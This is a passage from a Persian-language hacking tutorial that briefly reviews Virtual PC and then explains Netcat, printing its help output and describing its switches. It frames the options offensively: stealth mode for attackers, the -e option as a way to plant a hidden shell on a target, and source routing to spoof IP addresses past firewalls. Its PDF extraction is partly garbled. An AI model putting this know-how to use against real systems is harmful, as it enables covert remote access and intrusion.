اﺱﺖ ﮐﻪ ﺷﻤﺎ روی هﺎرد ﺧﻮد یﮏ هﺎرد ﻣﺠﺎزی ایﺠﺎد ﻣﻴﮑﻨﺪ و ﻧﺒﺎیﺪ ﻧﮕﺮان اﺱﺘﻔﺎدﻩ از دﺱﺘﻮرات ﺧﻮﺏﯽ هﻤﭽﻮن ‪ Fdisk‬و‪..‬‬ ‫ﺏﺎﺷﻴﺪ!‬ ‫ﻣﻌﺮﻓﯽ ﺑﺮﻧﺎﻣﻪ ‪ Connectix Virtual pc‬و ‪: Microsoft virtual pc‬‬ ‫اول ایﻦ را ﺏﮕﻮیﻢ ﮐﻪ ﺏﺮﻧﺎﻣﻪ ‪ Connectix Virtual pc‬ﺕﻮﺱﻂ ﻣﺎیﮑﺮوﺱﺎﻓﺖ ﺧﺮیﺪاری ﺷﺪﻩ و ﻧﺎم ﺁن ﺏﻪ ‪ Microsoft virtual pc‬ﺕﻐﻴﻴﺮ ﭘﻴﺪا‬ ‫ﮐﺮدﻩ و اﻟﺒﺘﻪ ﺏﺪﺕﺮ هﻢ ﺷﺪﻩ !! ﭘﺲ دﻧﺒﺎل ﻧﺴﺨﻪ ﻗﺪیﻤﯽ ‪ Connectix‬ﺏﮕﺮدیﺪ ﮐﻪ ﻓﮑﺮ ﮐﻨﻢ ﺕﻮ ﺷﺒﮑﻪ هﻢ ﺧﻴﻠﯽ ﮐﻢ اﺱﺖ وﻟﯽ از ﻟﻴﻨﻮﮐﺲ ﭘﺸﺘﻴﺒﺎﻧﯽ ﻣﻴﮑﻨﺪ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٦٦‬‬

‫ایﻦ ﺏﻴﻠﯽ ﭘﺴﺖ ﻓﻄﺮت ﺏﻌﺪ از ﺧﺮیﺪ ایﻦ ﺏﺮﻧﺎﻣﻪ و ﺕﻐﻴﻴﺮ اﺱﻢ ﺁن دیﮕﺮ از ﻟﻴﻨﻮﮐﺲ در ایﻦ ﺏﺮﻧﺎﻣﻪ ﭘﺸﺘﻴﺒﺎﻧﯽ ﻧﻤﻴﮑﻨﺪ وﻟﯽ ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ در ایﻦ ﺏﺮﻧﺎﻣﻪ‬ ‫ﻟﻴﻨﻮﮐﺲ ﻧﺼﺐ ﮐﻨﻴﺪ وﻟﯽ اﻣﮑﺎﻧﺎت ﺷﺒﮑﻪ در اﺧﺘﻴﺎر ﺷﻤﺎ ﻧﻴﺴﺖ ) ﺏﻴﻠﯽ ﻣﻴﮑﺸﻢ ﺕﻮ را !!!!(‪.‬‬ ‫ﻧﺴﺨﻪ ‪ Connectix‬ﺁن واﻗﻌًﺎ ﻣﺤﺸﺮ ﺏﻮد در ایﻦ ﺱﺎدﮔﯽ ﮐﺎرایﯽ ﺧﻮﺏﯽ داﺷﺖ وﻟﯽ‪ ....‬ﺏﮕﺬریﻢ ﮐﺎر ﺏﺎ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺧﻴﻠﯽ ﺱﺎدﻩ اﺱﺖ و اﺻﻼ ﻧﻴﺎز ﺏﻪ‬ ‫ﺕﻮﺽﻴﺢ ﻧﺪارد و ﺏﺪ ﻧﻴﺴﺖ ﮐﻤﯽ ﺕﺠﺮﺏﻪ ﮐﺴﺐ ﮐﻨﻴﺪ ﺏﺎ ﺁن‪ .‬ﻗﺴﻤﺖ ﺷﺒﮑﻪ ﺁن ﺕﻘﺮیﺒﺎ ﻣﺜﻞ ‪ VM‬اﺱﺖ و ﺕﻮﺽﻴﺢ هﻢ ﻧﻤﻴﺨﻮاهﺪ ‪ .‬ﻣﺸﮑﻞ ﺕﺨﺼﻴﺺ رم هﻢ‬ ‫ﻧﺪارد وﻟﯽ اﺻﻮﻻ ﺷﺒﻴﻪ ‪ VM‬اﺱﺖ و ﺏﺪ ﻧﻴﺴﺖ از ﻓﺮﻣﻮﻟﯽ ﮐﻪ ﺏﺎﻻ ﺏﻪ ﺷﻤﺎ هﺎ یﺎد دادم ﺏﺮای ﭘﺎیﺪاری ﻣﺎﺷﻴﻦ ﺧﻮدﺕﺎن و ﻣﺎﺷﻴﻦ ﻣﺠﺎزی از ﺁن اﺱﺘﻔﺎدﻩ‬ ‫ﮐﻨﻴﺪ ‪.‬‬ ‫ﺽﻤﻴﻤﻪ ﺷﺸﻢ ؛ ﻣﻌﺮﻓﯽ اﺏﺰار ‪ NC‬یﺎ ﺏﺎ ﻧﺎم ﮐﺎﻣﻞ ‪: Net Cat‬‬ ‫یﮏ اﺏﺰار هﻤﻪ ﮐﺎرﻩ اﺱﺖ‪ .‬ﺏﺎیﺪ ﺧﻴﻠﯽ ﭘﻴﺶ از ایﻦ ‪ ،‬ایﻦ اﺏﺰار ﻣﻌﺮﻓﯽ ﻣﻴﮑﺮدم وﻟﯽ ﻧﻤﻴﺪاﻧﺴﺘﻢ ﮐﻪ ﮐﺠﺎ ﺏﺎیﺪ درﺏﺎرﻩ ﺁن ﺕﻮﺽﻴﺢ ﺏﺪهﻢ‪ .‬هﻤﻴﺸﻪ ﮐﺎر راﻩ‬ ‫ﻣﯽ اﻧﺪازد‪ .‬دارای یﮏ ﺱﺮی ﺱﻮیﭻ اﺱﺖ ﮐﻪ هﻤﻪ را ﺕﻮﺽﻴﺢ ﮐﺎﻣﻞ ﻣﻴﺪهﻢ اﻟﺒﺘﻪ ﭼﻮن ﻣﻴﺪاﻧﻢ ﺏﻪ ﮐﺎر ﺷﻤﺎ هﺎ ﺧﻮاهﺪ ﺁﻣﺪ ﻣﻴﮕﻮیﻢ!!‬ ‫هﻤﻪ ﮐﺎرﻩ اﺱﺖ ‪ ،‬از ﭘﻮیﺶ ﭘﻮرت ﮔﺮﻓﺘﻪ ﺕﺎ یﮏ اﺱﺐ ﺕﺮوا ﻣﺮگ ﺏﺎر ﺕﺎ یﮏ ﻧﺮم اﻓﺰار ﺏﺮای ﺟﻤﻊ ﺁوری اﻃﻼﻋﺎت و‪ ....‬دوﺱﺖ دارم ﺁن را ﭼﻮن‬ ‫واﻗﻌًﺎ ﻻیﻖ ایﻦ دوﺱﺖ داﺷﺘﻦ اﺱﺖ‪.‬‬ ‫‪C:\amir>nc -h‬‬ ‫]‪[v1.10 NT‬‬ ‫‪connect to somewhere: nc [-options] hostname port[s] [ports] ...‬‬ ‫]‪listen for inbound: nc -l -p port [options] [hostname] [port‬‬ ‫‪options:‬‬ ‫‪-d‬‬ ‫‪detach from console, stealth mode‬‬ ‫‪-e prog‬‬ ‫]!!‪inbound program to exec [dangerous‬‬ ‫‪-g gateway source-routing hop point[s], up to 8‬‬ ‫‪-G num‬‬ ‫‪source-routing pointer: 4, 8, 12, ...‬‬ ‫‪-h‬‬ ‫‪this cruft‬‬ ‫‪-i secs‬‬ ‫‪delay interval for lines sent, ports scanned‬‬ ‫‪-l‬‬ ‫‪listen mode, for inbound connects‬‬ ‫‪-L‬‬ ‫‪listen harder, re-listen on socket close‬‬ ‫‪-n‬‬ ‫‪numeric-only IP addresses, no DNS‬‬ ‫‪-o file‬‬ ‫‪hex dump of traffic‬‬ ‫‪-p port‬‬ ‫‪local port number‬‬ ‫‪-r‬‬ ‫‪randomize local and remote ports‬‬ ‫‪-s addr‬‬ ‫‪local source address‬‬ ‫‪-t‬‬ ‫‪answer TELNET negotiation‬‬ ‫‪-u‬‬ ‫‪UDP mode‬‬ ‫‪-v‬‬ ‫]‪verbose [use twice to be more verbose‬‬ ‫‪-w secs‬‬ ‫‪timeout for connects and final net reads‬‬ ‫‪-z‬‬ ‫]‪zero-I/O mode [used for scanning‬‬ ‫]‪port numbers can be individual or ranges: m-n [inclusive‬‬

‫‪١‬‬

‫ﺱﻮیﭻ‬ ‫‪-d‬‬

‫‪٢‬‬

‫>‪-e
‫ﺕﻮﺽﻴﺤﺎت‬ ‫ایﻦ ﮔﺰیﻨﻪ ﺕﻨﻬﺎ ﺕﺤﺖ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ویﻨﺪوز ﻗﺎﺏﻞ ﺏﻬﺮﻩ ﺏﺮداری ﺏﻮدﻩ و ﺏﺎﻋﺚ ﻣﯽ ﺷﻮد ﺕﺎ ﺏﺮﻧﺎﻣﻪ ‪ tNetca‬در ﺡﺎﻟﺖ‬ ‫ﻣﺨﻔﯽ ) یﺎ اﺻﻄﻼﺡﺎ ‪ ( stealth mode‬ﻓﻌﺎﻟﻴﺖ ﻧﻤﺎیﺪ ؛ ﺏﺪیﻦ ﻣﻌﻨﯽ ﮐﻪ ﺏﻪ ﻃﻮر ﻣﺠﺰا از اﻋﻼن ‪ MS-DOS‬ﺏﻪ‬ ‫اﺟﺮا درﺁیﺪ‪ .‬ایﻦ ﮔﺰیﻨﻪ ﺏﻪ ﺏﺮﻧﺎﻣﻪ ‪ Netcat‬اﺟﺎزﻩ ﻣﻴﺪهﺪ ﺕﺎ ﺏﺪون ﻧﻴﺎز ﺏﻪ ﺏﺎز ﻧﮕﻪ داﺷﺘﻦ ﭘﻨﺠﺮﻩ اﻋﻼن ‪MS-DOS‬‬ ‫‪ ،‬در ﺡﺎﻟﺖ ﺁﻣﺪﻩ یﺎ ﮔﻮش ﺏﻪ زﻧﮓ ) ‪ ( Mode Listening‬ﺏﻪ ﻓﻌﺎﻟﻴﺖ ﺧﻮد اداﻣﻪ دهﺪ‪ .‬هﻤﭽﻨﻴﻦ ﮔﺰیﻨﻪ ﻣﻮرد ﺏﺤﺚ‬ ‫اﻃﻤﻴﻨﺎن ﺏﻬﺘﺮی را درﺏﺎرﻩ ﻓﻌﺎﻟﻴﺖ ﺏﺮﻧﺎﻣﻪ ‪ Netcat‬ﺏﻪ ﻣﻬﺎﺟﻢ ﻣﻴﺪهﺪ‪.‬‬ ‫در ﺻﻮرﺕﯽ ﮐﻪ ﺏﺮﻧﺎﻣﻪ ‪ nc‬ﺕﻮﺱﻂ ﮔﺰیﻨﻪ ‪ gaping_security_hole‬ﮐﺎﻣﭙﺎیﻞ ﺷﺪﻩ ﺏﺎﺷﺪ ‪ ،‬هﺮ ﺏﺎر ﮐﻪ ﺏﺮﻧﺎﻣﻪ ای از‬ ‫ﻃﺮیﻖ یﮏ ﭘﻮرت ﺏﻪ ﺧﺼﻮص اﻗﺪام ﺏﻪ ﺏﺮﻗﺮاری اﺕﺼﺎل ﺏﺎ ﮐﺎﻣﭙﻴﻮﺕﺮی ﻣﯽ ﮐﻨﺪ ﮐﻪ ﻋﻬﺪﻩ دار ﻣﻴﺰﺏﺎﻧﯽ ﺏﺮﻧﺎﻣﻪ ‪NC‬‬ ‫اﺱﺖ ‪ ،‬ﻧﻤﻮﻧﻪ ﺁﻣﺪﻩ ﺏﻪ ﮐﺎر از ایﻦ ﺏﺮﻧﺎﻣﻪ ﮐﻪ ﺏﺮ روی ﺁن ﭘﻮرت ﮔﻮش ﺏﻪ زﻧﮓ اﺱﺖ ﻓﺮﻣﺎن ‪ command‬را اﺟﺮا‬ ‫ﺧﻮاهﺪ ﮐﺮد ‪ ،‬ایﻦ در ﺡﺎﻟﯽ اﺱﺖ ﮐﻪ ﺏﺮﻧﺎﻣﻪ ‪ NC‬در ﺱﻤﺖ ﮐﻼیﻨﺖ ﺟﺮیﺎن ورودی و ﺧﺮوﺟﯽ و یﺎ ‪ I/O‬را از‬ ‫ﻃﺮیﻖ ﺧﻂ ﻟﻮﻟﻪ ای ﻣﺠﺎزی ﺏﻪ ﻧﻤﻮﻧﻪ دیﮕﺮی از ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﮐﻪ در ﺟﺎی دیﮕﺮی ﮔﻮش ﺏﻪ زﻧﮓ و ﺁﻣﺎدﻩ اﺱﺖ‬ ‫ارﺱﺎل ﻣﻴﮑﻨﺪ‪ .‬اﺱﺘﻔﺎدﻩ از ایﻦ ﻗﺎﺏﻠﻴﺖ ﻓﻮق اﻋﺎدﻩ ﺧﻄﺮﻧﺎک اﺱﺖ ﻣﮕﺮ ایﻨﮑﻪ ﺏﻪ ﻓﺮایﻨﺪ در ﺡﺎل اﺟﺮا ﮐﺎﻣﻼ ﻣﺸﺮف‬ ‫ﺏﺎﺷﻴﺪ‪ .‬ﺏﻬﺮﻩ ﮔﺮی از ایﻦ ﮔﺰیﻨﻪ روش ﺁﺱﺎن ﺏﺮای راﻩ اﻧﺪازی یﮏ ‪ shell‬ﻣﺨﻔﯽ ﺏﺮ روی یﮏ ﺱﻴﺴﺘﻢ ﻧﻤﻮﻧﻪ ﺏﻪ‬ ‫ﻣﻨﻈﻮر اﺟﺮای ﻓﺮﻣﺎﻧﻬﺎی ﻣﻮرد ﻧﻈﺮ ﻣﺤﺴﻮب ﻣﻴﺸﻮد‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬ ‫‪٣‬‬

‫>‪-i<second‬‬

‫‪۴‬‬

‫>‪-g
‫‪۵‬‬

‫>‪-G
‫‪۶‬‬

‫‪-l‬‬

‫‪٧‬‬

‫‪-L‬‬

‫‪٨‬‬

‫‪-n‬‬

‫‪٩‬‬

‫>‪-o
‫‪١٠‬‬

‫>‪-p<port‬‬

‫ﺻﻔﺤﻪ‬

‫‪٦٧‬‬

‫ایﻦ ﮔﺰیﻨﻪ ﻣﺸﺨﺺ ﮐﻨﻨﺪﻩ ﺕﺎﺧﻴﺮی اﺱﺖ ﮐﻪ ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﻣﺎﺏﻴﻦ دو ﻓﺮایﻨﺪ ارﺱﺎل ﻣﺘﻮاﻟﯽ دادﻩ هﺎ ﻣﻨﻈﻮر ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﺏﺮای ﻣﺜﺎل هﻨﮕﺎم اﻧﺘﻘﺎل اﻃﻼﻋﺎت یﮏ ﻓﺎیﻞ ﺏﻪ ﺏﺮﻧﺎﻣﻪ ‪ ، NC‬ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ اﻧﺪازﻩ زﻣﺎﻧﯽ ﮐﻪ ﺕﻮﺱﻂ ﺁرﮔﻮﻣﺎن ﻓﻮق‬ ‫ﻣﺸﺨﺺ ﻣﻴﺸﻮد ‪ ،‬ﭘﻴﺶ از دریﺎﻓﺖ ﺧﻂ ﺏﻌﺪی از ورودی ﺕﺎﺧﻴﺮ ایﺠﺎد ﻣﻴﮑﻨﺪ‪ .‬اﺱﺘﻔﺎدﻩ از ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﺏﺮ روی‬ ‫ﭼﻨﺪن ﭘﻮرت از یﮏ رایﺎﻧﻪ ﻣﻴﺰﺏﺎن ﻣﻮﺟﺐ ﻣﻴﺸﻮد ﺕﺎ ایﻦ ﺏﺮﻧﺎﻣﻪ ﭘﻴﺶ از ارﺕﺒﺎط ﺏﺎ ﭘﻮرت ﺏﻌﺪی ﺏﻪ اﻧﺪازﻩ ﺕﻌﻴﻴﻦ‬ ‫ﺷﺪﻩ ﺕﻮﺱﻂ ﺁرﮔﻮﻣﺎن ﻣﻮرد ﺏﺤﺚ ﺙﺎﻧﻴﻪ ﺕﺎﺧﻴﺮ ایﺠﺎد ﮐﻨﺪ‪ .‬ایﻦ ﻗﺎﺏﻠﻴﺖ ﺏﻪ ﮐﺎرﺏﺮ اﺟﺎزﻩ ﻣﻴﺪهﺪ ﺕﺎ ﻓﺮایﻨﺪ اﻧﺘﻘﺎل دادﻩ هﺎ و‬ ‫یﺎ ﺡﻤﻼت اﺡﺘﻤﺎﻟﯽ ﺏﺮ روی یﮏ ﺱﺮویﺲ ﻣﻮﺟﺪ را ﺏﺎ وﺽﻮح ﺏﻴﺸﺘﺮی ﻣﺸﺎهﺪﻩ ﮐﺮدﻩ ‪ ،‬ﺽﻤﻦ ایﻨﮑﻪ اﻣﮑﺎن ﻣﺮاﻗﺒﺖ‬ ‫از ﭘﻮرت هﺎ را ﺕﺤﺖ یﮏ ﻧﻮع ﺱﻴﺴﺘﻢ ﺕﺸﺨﻴﺺ ﺕﺠﺎوز یﺎ اﺻﻄﻼﺡﺎ ‪ ، IDS‬در اﺧﺘﻴﺎر ﻣﺪیﺮ ﺱﻴﺴﺘﻢ ﻗﺮار ﻣﯽ دهﺪ‪.‬‬ ‫اﺱﺘﻔﺎدﻩ از ایﻦ زیﻨﻪ ﻣﻴﺘﻮاﻧﺪ ﮔﻮل زﻧﻨﺪﻩ ﺏﺎﺷﺪ !! در واﻗﻊ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺷﻴﻮﻩ ﺱﻔﺖ ﺱﺨﺘﯽ را ﺏﺮای ﻣﺴﻴﺮ یﺎﺏﯽ ﻣﻨﺒﻊ‬ ‫ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار ﻧﻤﻴﺪهﺪ ) ایﻦ ﻣﻮﺽﻊ را ﺏﻪ زودی در ﻗﺴﻤﺘﯽ ﺏﺎ ﻋﻨﻮان ﺟﻌﻞ ﺁدرس ‪ IP‬یﺎ هﻤﺎن ‪IP‬‬ ‫‪ Spoofing‬ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ( ‪ .‬ﺏﻬﺮﻩ ﮔﻴﺮی از ﺕﻌﺪاد ﺡﺪاﮐﺜﺮ ‪ ٨‬ﮔﺰیﻨﻪ ‪ –g‬در ﺱﻄﺮ ﻓﺮﻣﺎن ﺏﻪ ﻣﻨﻈﻮر اﺟﺒﺎر در‬ ‫ﻋﺒﻮر دادﻩ هﺎ از ﺁدرس ‪ IP‬ﻣﺸﺨﺺ ﻣﺠﺎز ﻣﻴﺒﺎﺷﺪ‪ .‬ایﻦ ﻗﺎﺏﻠﻴﺖ در ﻣﻮاردی ﮐﻪ ﺟﻌﻞ ﺁدرس ‪ IP‬ﻣﻨﺒﻊ دادﻩ هﺎ )‬ ‫ﺟﻬﺖ دور زدن ﻓﻴﻠﺘﺮهﺎ دیﻮار ﺁﺕﺶ یﺎ ﻟﻴﺴﺖ ﺁدرس هﺎی ﻣﺠﺎز ﺏﺮای دﺱﺖ یﺎﺏﯽ ( ﻣﺪ ﻧﻈﺮ ﺏﻮدﻩ و ﻣﺎیﻞ ﺏﻪ دریﺎﻓﺖ‬ ‫ﭘﺎﺱﺦ از ﺟﺎﻧﺐ رایﺎﻧﻪ ﻣﻴﺰﺏﺎن ﺏﺎﺷﻴﻢ ‪ ،‬ﻣﻔﻴﺪ واﻗﻊ ﻣﻴﺸﻮد‪ .‬ﺏﻪ واﺱﻄﻪ ﻣﺴﻴﺮ یﺎﺏﯽ ﻣﻨﺒﻊ از ﻃﺮیﻖ ﮐﺎﻣﭙﻴﻮﺕﺮ ﺕﺤﺖ‬ ‫ﮐﻨﺘﺮل ﺧﻮد ﻣﻴﺘﻮاﻧﻴﻢ ﺏﺴﺘﻪ هﺎی ‪ IP‬را ﻣﺠﺒﻮر ﮐﻨﻴﻢ ﺕﺎ ﺏﻪ ﺟﺎی اﻧﺘﻘﺎل ﺏﻪ ﻣﻘﺼﺪ واﻗﻌﯽ ﺧﻮد ﺏﻪ ﺁدرس ﻣﻮرد ﻧﻈﺮ ﻣﺎ‬ ‫ﺟﺎری ﺷﻮﻧﺪ‪ .‬ﺏﺎ ایﻦ هﻤﻪ ﺕﻮﺟﻪ ﺏﻪ ایﻦ ﻣﻮﺽﻮع ﻣﻬﻢ اﺱﺖ ﮐﻪ ایﻦ ﻓﺮایﻨﺪ در اﻏﻠﺐ ﻣﻮارد ﻏﻴﺮ ﻋﻤﻠﯽ اﺱﺖ ﭼﺮا ﮐﻪ‬ ‫ﺏﻴﺸﺘﺮ روﺕﺮهﺎ اﻣﺮوزی ﮔﺰیﻨﻪ ﻣﺴﻴﺮ یﺎﺏﯽ ﻣﻮرد ﺏﺤﺚ را ﻧﺎدیﺪﻩ ﮔﺮﻓﺘﻪ ﺽﻤﻦ ﺁﻧﮑﻪ ﺏﻴﺸﺘﺮ ﻓﻴﻠﺘﺮهﺎی ﻧﺼﺐ ﺷﺪﻩ ﺏﺮ‬ ‫روی ﭘﻮرت هﺎی و هﻤﭽﻨﻴﻦ اﻏﻠﺐ دیﻮارهﺎی اﺕﺶ هﺮﮔﻮﻧﻪ اﻗﺪاﻣﯽ را ﺟﻬﺖ اﻧﺠﺎم ایﻦ ار ﺏﻪ ﺙﺒﺖ ﻣﻴﺮﺱﺎﻧﻨﺪ‪.‬‬ ‫از ایﻦ ﮔﺰیﻨﻪ هﻨﮕﺎﻣﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد ﮐﻪ ﺧﻮاﺱﺘﻪ ﺏﺎﺷﻴﻢ ﺕﺎ ﺁدرس ‪ IP‬ﺏﻪ ﺧﺼﻮﺻﯽ را در ﻟﻴﺴﺖ ﺕﻌﻴﻴﻦ ﺷﺪﻩ ﺕﻮﺱﻂ‬ ‫ﮔﺰیﻨﻪ ‪ –g‬ﺏﻪ ﻋﻨﻮان ﺁدرس ﺏﻌﺪی ﻣﺸﺨﺺ ﮐﻨﻴﻢ ‪ .‬ﺏﻪ دﻟﻴﻞ ﻣﺎهﻴﺖ ﭼﻬﺎر ﺏﺎیﺘﯽ ﺁدرس هﺎی ‪ IP‬ایﻦ ﺁرﮔﻮﻣﺎن هﻤﻮارﻩ‬ ‫ﺏﻪ ﺷﮑﻞ ﻣﻀﺮب هﺎی از ﻋﺪد ‪ ۴‬ﻇﺎهﺮ ﻣﻴﺸﻮد‪ .‬ﺏﻪ ﮔﻮﻧﻪ ای ﮐﻪ ﻋﺪد ‪ ۴‬ﺏﻪ اوﻟﻴﻦ ﺁدرس ‪ IP‬و ﻋﺪد ‪ ٨‬ﺏﻪ دوﻣﻴﻦ‬ ‫ﺁدرس ‪ IP‬در ﻟﻴﺴﺖ اﺷﺎرﻩ ﻣﻴﮑﻨﺪ و ﺏﺮای ﺱﺎیﺮ ﺁدرس هﺎ هﻢ ﺏﻪ هﻤﻴﻦ ﺕﺮﺕﻴﺐ اداﻣﻪ ﭘﻴﺪا ﻣﻴﮑﻨﺪ‪ .‬ایﻦ ﻗﺎﺏﻠﻴﺖ ﺏﺮای‬ ‫ﻣﻮاردی ﻣﻔﻴﺪ اﺱﺖ ﮐﻪ ﺏﺨﻮاهﻴﻢ ﮐﻪ ﺏﺨﺸﻬﺎی از ﻟﻴﺴﺖ ﺁدرس هﺎی ‪ IP‬را ﺏﻪ ﮔﻮﻧﻪ ای ﺟﻌﻞ ﮐﻨﻴﻢ ﮐﻪ ﺏﻪ ﻧﻈﺮ ﺁیﺪ ایﻦ‬ ‫ﺁدرﺱﻬﺎ از ﺟﺎی دیﮕﺮی ﺕﻌﻴﻴﻦ ﺷﺪﻩ اﻧﺪ‪ .‬ﺏﻪ ایﻦ ﺕﺮﺕﻴﺐ ﮐﻪ ﺏﺎ ﻗﺮار دادن ﺁدرس هﺎی ‪ IP‬ﺟﻌﻠﯽ در اوﻟﻴﻦ دو ﮔﺰیﻨﻪ –‬ ‫‪ g‬از ﻟﻴﺴﺖ ﺁدرس هﺎی ‪ IP‬و اﺱﺘﻔﺎدﻩ از ﻋﺪد ‪ ١٢‬ﺏﻪ ﻋﻨﻮان ﺁرﮔﻮﻣﺎن ﮔﺰیﻨﻪ ‪ –G‬ﻣﻴﺘﻮان ﺕﺮﺕﻴﺒﯽ داد ﺕﺎ ﺏﺴﺘﻪ هﺎی‬ ‫‪ IP‬ﻣﺮﺏﻮﻃﻪ ﻣﺴﺘﻘﻴﻤﺎ ﺏﻪ ﺱﻮﻣﻴﻦ ﺁدرس ‪ IP‬ﻣﻮﺟﺪ در ﻟﻴﺴﺖ ﻣﺴﻴﺮهﺎ ﺱﺮازیﺮ ﺷﻮد‪ .‬ﺏﺎ ایﻦ ﺡﺎل ﻣﺤﺘﻮای اﺻﻠﯽ ﺏﺴﺘﻪ‬ ‫هﺎ ﮐﻤﺎﮐﺎن ﺷﺎﻣﻞ ﺁدرس هﺎی ﺟﻌﻠﯽ ﺧﻮاهﺪ ﺏﻮد‪ .‬از ایﻦ رو ﭼﻨﻴﻦ ﺏﻪ ﻧﻈﺮ ﺧﻮاهﺪ رﺱﻴﺪ ﮐﻪ ﺏﺴﺘﻪ ﻣﻮرد ﻧﻈﺮ از‬ ‫ﻣﻮﻗﻌﻴﺖ ﻃﺒﻴﻌﯽ ﺧﻮد ﺏﻪ ﻣﻘﺼﺪ ارﺱﺎل ﺷﺪﻩ ‪ ،‬درﺡﺎﻟﯽ ﮐﻪ ﻓﺮایﻨﺪ ارﺱﺎل از ﻣﻮﻗﻌﻴﺖ ﻣﺘﻔﺎوﺕﯽ اﻧﺠﺎم ﺷﺪﻩ اﺱﺖ‪ .‬ایﻦ‬ ‫ﻗﺎﺏﻠﻴﺖ ﻣﻴﺘﻮاﻧﺪ هﻨﮕﺎم ﺟﻌﻞ ﺁدرس ‪ IP‬ﻣﺴﻴﺮ یﺎﺏﯽ ﻣﻨﺒﻊ ﻣﻔﻴﺪ واﻗﻊ ﺷﻮد ‪ ،‬اﻣﺎ هﻴﭻ ﺕﻀﻤﻴﻨﯽ در ﻣﻮرد دریﺎﻓﺖ ﭘﺎﺱﺦ‬ ‫از ﺟﺎﻧﺐ ﻣﻴﺰﺏﺎن در دﺱﺖ ﻧﺨﻮاهﺪ ﺏﻮد ‪ ،‬ﭼﺮا ﮐﻪ ﻣﻴﺰﺏﺎن ﻣﻮرد ﻧﻈﺮ ﺱﻌﯽ ﺧﻮاهﺪ داﺷﺖ ﺕﺎ ﻣﺴﻴﺮ را از ان ﭼﻪ ﮐﻪ‬ ‫ﺁدرس ‪ IP‬ﺟﻌﻞ ﺷﺪﻩ ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ‪ ،‬ﻣﻨﺤﺮف ﻧﻤﺎیﺪ ‪.‬‬ ‫ایﻦ ﮔﺰیﻨﻪ ﺏﺎﻋﺚ ﻓﻌﺎل یﺎ ﻏﻴﺮ ﻓﻌﺎل ﺷﺪن ﺡﺎﻟﺖ ﮔﻮش ﺏﻪ زﻧﮓ یﺎ ‪ Listening mode‬در ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﻣﻴﺸﻮد‪.‬‬ ‫ﮔﺰیﻨﻪ ﻓﻮق ﺏﺎیﺪ ﺏﻪ هﻤﺮاﻩ ﮔﺰیﻨﻪ ‪ –p‬ﺏﺮای ﺕﻌﻴﻴﻦ ﭘﻮرت ‪ TCP‬ﻣﻮرد ﻧﻈﺮ ﺏﻪ ﻣﻨﻈﻮر اﻧﻈﺎر ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﺟﻬﺖ‬ ‫ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺮ روی ﺁن ﭘﻮرت ﻣﻮر اﺱﺘﻔﺎدﻩ ﻗﺮار ﺏﮕﻴﺮد‪ .‬ﺏﺮای ﺏﻬﺮﻩ ﮔﻴﺮی از ﭘﻮرت هﺎی ‪ UDP‬ﺏﻪ ﺟﺎی‬ ‫‪ TCP‬ﮐﺎﻓﯽ اﺱﺖ ﺏﻪ ﺟﺎی ﮔﺰیﻨﻪ ‪ –p‬از ‪ –u‬اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ‪.‬‬ ‫ایﻦ ﮔﺰیﻨﻪ ﺕﻨﻬﺎ در ﺱﻴﺴﺘﻢ هﺎی ﻧﻮع ویﻨﺪوز ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ ﺏﻮدﻩ و ﻧﺴﺒﺖ ﺏﻪ ﮔﺰیﻨﻪ ﻗﺒﻠﯽ یﻌﻨﯽ ﮔﺰیﻨﻪ ‪ –L‬از ﻗﺎﺏﻠﻴﺖ‬ ‫ﺏﻴﺸﺘﺮی ﺏﺮﺧﻮردار اﺱﺖ‪ .‬ﮔﺰیﻨﻪ ﻣﻮرد ﺏﺤﺚ ﺏﺮﻧﺎﻣﻪ ‪ NC‬را ﻣﺠﺒﻮر ﻣﻴﮑﻨﺪ ﺕﺎ ﭘﺲ از ﺏﺴﺘﻦ یﮏ اﺕﺼﺎل ‪ ،‬اﻗﺪاﻣﯽ‬ ‫را ﺟﻬﺖ ﺕﻐﻴﻴﺮ ﺡﺎﻟﺖ ﻣﺠﺪد ﮔﻮش ﺏﻪ زﻧﮓ ﺏﺎ ﺏﻬﺮﻩ ﮔﻴﺮی از ﮔﺰیﻨﻪ ﺱﻄﺮ ﻓﺮﻣﺎن ﻣﻮرد ﻧﻈﺮ اﻧﺠﺎم دهﺪ‪ .‬ﺏﻪ ﺕﺮﺕﻴﺐ‬ ‫‪ T‬ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﻣﻴﺘﻮاﻧﺪ در ﺧﻮاﺱﺖ ﺏﻌﺪی ﺟﻬﺖ اﺕﺼﺎل را ﺏﺪون دﺧﺎﻟﺖ ﮐﺎرﺏﺮ و ﺡﺘﯽ ﭘﺲ از ﺁن ﮐﻪ ﻓﺮﺁیﻨﺪ اﺕﺼﺎل‬ ‫اوﻟﻴﻪ ﺏﻪ اﺕﻤﺎم رﺱﻴﺪﻩ و ﺏﺴﺘﻪ ﺷﺪﻩ اﺱﺖ ‪ ،‬ﺏﭙﺬیﺮد‪ .‬ﻣﺸﺎﺏﻪ ﮔﺰیﻨﻪ ‪ –l‬ﺏﻬﺮﻩ ﮔﻴﺮی از ایﻦ ﮔﺰیﻨﻪ ﻣﺴﺘﻠﺰم اﺱﺘﻔﺎدﻩ 